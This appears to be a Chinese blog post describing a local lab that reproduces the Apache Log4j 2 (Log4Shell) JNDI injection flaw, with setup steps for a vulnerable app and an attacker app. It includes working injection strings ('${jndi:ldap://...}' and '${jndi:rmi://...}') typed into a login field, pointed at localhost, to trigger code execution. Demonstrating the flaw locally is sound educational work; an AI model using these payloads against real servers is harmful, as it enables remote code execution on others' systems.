Apache Log4j 2漏洞本地重现,下载打包两分钟搞定

282 阅读2分钟

介绍

Apache Log4j 2漏洞本地重现,下载打包两分钟搞定。目前支持ldaprmi两种类型攻击,欢迎体验。

ldap攻击

${jndi:ldap://127.0.0.1:10912/hacker}

rmi攻击

${jndi:rmi://127.0.0.1:1099/hacker}

安装教程

1. 安装Jdk,版本小于jdk-8u191

2. 安装maven

3. 下载代码

在目录D:/Tmp下打开Cmd工具并克隆代码

git clone https://gitee.com/langdashu/bug-log4j2.git

4. 编译打包

4.1 进入项目根目录

cd bug-log4j2

4.2 编译打包

mvn clean package

5. 启动被攻击应用

5.1 进入模块根目录

cd bug-log4j2-application

5.2 启动应用

java -jar target\bug-log4j2-application-1.0-SNAPSHOT.jar

6. 启动发起攻击应用

6.1 进入模块根目录

cd bug-log4j2-attacker

6.2 启动应用

java -jar target\bug-log4j2-attacker-1.0-SNAPSHOT.jar

使用说明

1. 访问应用

在浏览器访问被攻击引用,地址:http://127.0.0.1:18080/

2. 尝试正常登录系统

2.1 使用账号密码admin/123456登录

2.2 登录成功并进入用户信息页

3. 使用ldap方式攻击应用

3.1 在账号栏输入如下内容,密码为任意字符串

${jndi:ldap://127.0.0.1:10912/hacker}

3.2 系统登录报错

3.3 刷新页面,发现服务已不可用,被攻击应用宕机

3.4 查看被攻击应用控制台,发现输出攻击者的恶意日志"大佛保平安"

上图中"大佛保平安"图形日志打印代码位于工程bug-log4j2-attacker中com.langdashu.bug.log4j2.attacker.hacker.Attacker

4. 使用rmi方式攻击应用

4.1 在账号栏输入如下内容,密码为任意字符串

${jndi:rmi://127.0.0.1:1099/hacker}

4.2 系统登录报错

4.3 查看被攻击应用控制台,发现输出攻击者的恶意日志"美女"和"大佛保平安"

上图中"美女"图形日志打印代码位于工程bug-log4j2-attacker中com.langdashu.bug.log4j2.attacker.hacker.AttackerFactory

结论

被攻击服务会执行攻击者注入的恶意代码,其危险程度可想而知。

UP主直通车

Log4j高危漏洞!具体原因解析!全网第一!

Log4j高危漏洞 (补充视频)

Log4j高危漏洞!具体原因解析、复现、排除及修复全网第一!

大叔声明

所有资源来自网络,此案例仅仅是一个简单的整合,希望可以帮助到大家。

重要提示

不搞事! 不搞事! 不搞事!

原文链接

Apache Log4j 2漏洞本地重现,下载打包两分钟搞定 - 浪大叔